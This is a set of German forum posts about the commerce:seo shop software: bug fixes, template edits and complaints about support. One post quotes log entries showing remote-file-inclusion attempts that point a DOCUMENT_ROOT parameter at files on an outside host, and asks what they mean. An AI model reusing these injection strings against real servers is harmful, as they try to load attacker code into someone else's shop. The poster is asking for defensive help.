mein tmp ordner ist leer, nichts zu finden.
Kann man solche Versuche evtl. über die htaccess zusätzlich blocken/abweisen?
Beiträge von CharlyF
-
-
Ich habe in meinem Shop heute regelmäßig (commerce seo 1.1) unter "Wer ist online?" heute Einträge, wie:
Guest 210.172.183.50 08:16:38 08:16:38 ///?_SERVER[DOCUMENT_ROOT]=http://rakuikumama.net/pages/jcok.xpp??
und
Guest 210.172.183.50 08:16:34 08:16:34 ///?_SERVER[DOCUMENT_ROOT]=http://rakuikumama.net/pages/jprinter.xpp??
und
Guest 210.172.183.50 08:16:30 08:16:30 ///?_SERVER[DOCUMENT_ROOT]=test??
Die beiden xpp-Dateien lassen sich herunterladen. Was sind das für Versuche und kann der Hacker hier etwas erreichen, auslesen oder beschädigen?
Danke
-
Stimmt genau - wer nix weiß kann auch nix dazu sagen... außer freche Antworten auf Supportanfragen
-
"tschüss" und Thema geschlossen....
Freche Antworten und Arroganz... lächerlich
-
So, nun reichts mir.
Nachdem die Version 2 ja mit dem Vermerk "noch nicht für produktive Zwecke" versehen ist, sollte man ja davon ausgehen können, dass die Vorversion dafür taugt.
Nachdem ich nun 3 Wochen beinahe jeden Tag damit verbracht hatte, Bugs zu finden und zu beheben, den geplanten Shop rechtssicher zu machen, mir hier im Forum vom "Entwickler" anhören musste, wenn ich kritisieren will, solle ich wo anders hingehen oder mir gesagt wurde, er habe keine Zeit, da er ja an der Version 2 arbeiten müsse, ist commerce:seo nun für mich gestorben.
Ich wollte mit einem Shop eigentlich Geld verdienen und nicht 3 Wochen lang die Versäumnisse anderer, die sich mit dem Produkt in der Sonne aalen wollen, beheben.
Satte 3 DIN A4 Seiten mit notierten, NOTWENDIGEN Änderungen....
Ich bin auch Softwareentwickler, sonst hätte ich wohl noch länger gebraucht oder Fehler nie gefunden oder einen nicht rechtssicheren Shop online gestellt.
Aber wenn man mit einem fertigen Script, egal ob kostenlos oder nicht, DREI Wochen verbringt und dennoch nicht "produktiv" werden kann, so hat das Script bzw. dessen Modifikation eindeutig sein Ziel verfehlt.
Leute mit Ahnung von PHP & Co. kann ich sagen "viel Spaß"
Laien rate ich nur "Finger weg"
-
Hallo,
mir stellt sich folgendes Problem:
Kategoriestruktur:
Hauptkategorie 1
Unterkategorie Ebene 1
Unterkategorie Ebene 2
Hauptkategore 2
usw.Klicke ich mich in die Hauptkategorie oder Unterkategorie Ebene 1, werden mir "Neue Produkte" angezeigt. Dort fehlt der "Details"-Button - nur der "Kaufen"-Button wird angezeigt.
Erst in der letztlich tiefsten Kategorie werden wunschgemäß dann beide angezeigt.Der "Details"-Button sollte natürlich immer zu jedem Produkt angezeigt werden.
Welche der HTML-Dateien ist für diese Kategorien zu bearbeiten?
In der new_products_overview.html und new_products_default.html steht bereits
<a href="{$module_data.PRODUCTS_LINK}">{php}echo xtc_image_button('button_details.gif','Details');{/php}</a>
In der new_products.html fehlt dies, dachte also, da muss es auch rein. Hat aber keinen Effekt, d.h. der Button kommt trotzdem nicht.
GELÖST:
Browsercache
<a href="{$module_data.PRODUCTS_LINK}">{php}echo xtc_image_button('button_details.gif','Details');{/php}</a>
vor
{$module_data.PRODUCTS_BUTTON_BUY_NOW}
setzen. Das wars.
-
Ferner bleibt aber kurios für mich, warum in der Box "Neue Artikel" welche angezeigt werden, auf der Seite "Neue Artikel" jedoch nicht.
-
Ok, ich glaub ich habs.
Wird ein Artikel durch kopieren angelegt, scheint date_added leer, d.h. auf 0000... gespeichert zu werden. Wäre soweit auch ok, da der Artikel ja kopiert ist.
Das "Erscheinungsdatum" ist aber meiner Meinung nach doch mit date_added gleichzusetzen.
Bearbeite ich nun einen kopierten Artikel im Anschluß im Admin, so sollte, wenn ich bei Erscheinungsdatum ein Datum eingebe, dieses doch in products_date_added gespeichert werden.
Vielleicht in künftigen Versionen per checkbox.
-
Also
$insert_sql_data = array ('products_date_added' => 'now()');
Ist drin...
PS: date_modified funktioniert übrigens
-
Also
$insert_sql_data = array ('products_date_added' => 'now()');
Ist drin...
-
Ok, lass uns mal als erstes das Kriegsbeil begraben! Wir scheinen beide gereizt zu sein! Friede!
-
Ich habe KEINE Demo-Produkte in meiner Installation, sondern mehr als 90 eigene angelegt und alle stehen auf 0000....
Bitte stell mich nicht als doof hin.
Egal ob die 1.1 nun beta ist oder nicht und Du mit der V2 viel zu tun hast. Wenn Du Support für die 1.1 und dieses Forum anbietest, musst Du Dich auch um Meldungen von Bugs kümmern.
Was hilft es mir, nun auch noch die V2 zu installieren und diese zu testen. Da fang ich ja wieder von vorne an.
Ich dachte ursprünglich, ein Shop sei dazu da, Produkte zu verkaufen.
Im Moment bin ich Beta-Tester und nix anderes... und das ärgert halt...
Sollte nicht beleidigend rüberkommen...
-
wow - das ist der Hammer... dachte, dies heisst "Support-Forum"...
Das hat nichts mit zensieren zu tun!
Ich bin selbst Entwickler und würde ich einem meiner Kunden eine derartige Antwort präsentieren, würde ich fristlos entlassen werden.
V2 soll noch nicht für produktive Shops eingesetzt werden, also nimmt man die Vorversion, findet darin aber einen mehr oder weniger großen Fehler nach dem anderen... und darf keine Kritik äußern? Starke Leistung...
-
wenn ich seit mehr als einer Woche daran arbeite, sicher nicht mit Demo Produkten - meine eigenen Produkte stehen nach dem Speichern auf 0000...
-
und warum ist das so? So eine Aussage hilft nicht weiter...
-
Also bastelt man nun tagelang herum bis irgendwann mal die V2 stable ist?
-
Alles anzeigen
Lösungsansatz - leider wird diese Kategorie von den Entwicklern wohl eher selten gelesen...
rss_news.php
if ($with_tax) {
$tax_info = sprintf(TAX_INFO_INCL, $tax_rate.' %');
} else {
$tax_info = sprintf(TAX_INFO_ADD, $tax_rate.' %');
}ersetzen durch:
$tax_info = '';
if($tax_rate > 0)
{
if ($with_tax)
{
$tax_info = sprintf(TAX_INFO_INCL, $tax_rate.' %');
}
else
{
$tax_info = sprintf(TAX_INFO_ADD, $tax_rate.' %');
}
}Damit der Feed auch den Grundpreis enthält, empfehle ich (persönlich) noch folgendes:
oben:
require_once (DIR_FS_INC.'xtc_get_vpe_name.inc.php');und nach:
$price = $xtPrice->xtcGetPrice($listing['products_id'], $format = true, 1, $listing['products_tax_class_id'], $listing['products_price'], 1);einfügen:
if ($listing['products_vpe_status'] == 1 && $listing['products_vpe_value'] != 0.0)
{
$vpePrice = $xtPrice->xtcFormat($price['plain'] * (1 / $listing['products_vpe_value']), true).TXT_PER.xtc_get_vpe_name($listing['products_vpe']); }und nach:
<tr><td><strong>Preis: " . $price['formated'] . "</strong> " . $tax_info . $ship_info ."</td></tr>einfügen:
<tr><td>(Grundpreis:".$vpePrice.")</td></tr> -
Das hat mit der Anordnung der CSS Befehle zu tun.
Öffne die /templates/cseo-css-001/source/loginbox.php:
Suche:
PHP$box_smarty->assign('FIELD_EMAIL', xtc_draw_input_field('email_address', '', 'style="width:97%" maxlength="50"'));$box_smarty->assign('FIELD_PWD', xtc_draw_password_field('password', '', 'style="width:40%" maxlength="30"'));
Ersetze mit:PHP$box_smarty->assign('FIELD_EMAIL', xtc_draw_input_field('email_address', '', 'style="width:97%" maxlength="50" tabindex="1"')); $box_smarty->assign('FIELD_PWD', xtc_draw_password_field('password', '', 'style="width:40%" maxlength="30" tabindex="2"'));Dann springt der der Cusour bei TAB in der richtigen Reihenfolge. Wer's braucht...
Also diese Sprüche nerven echt ... "wer's braucht..."DER KUNDE (USABILITY....)
-
Lösungsansatz - leider wird diese Kategorie von den Entwicklern wohl eher selten gelesen...
rss_news.php
if ($with_tax) {
$tax_info = sprintf(TAX_INFO_INCL, $tax_rate.' %');
} else {
$tax_info = sprintf(TAX_INFO_ADD, $tax_rate.' %');
}ersetzen durch:
$tax_info = '';
if($tax_rate > 0)
{
if ($with_tax)
{
$tax_info = sprintf(TAX_INFO_INCL, $tax_rate.' %');
}
else
{
$tax_info = sprintf(TAX_INFO_ADD, $tax_rate.' %');
}
} -
- berücksichtigt nicht die Einstellungen im Admin
- zeigt immer inkl. oder zzgl. X % MwSt. an, auch wenn man diese nicht ausweist (ausweisen muss/darf)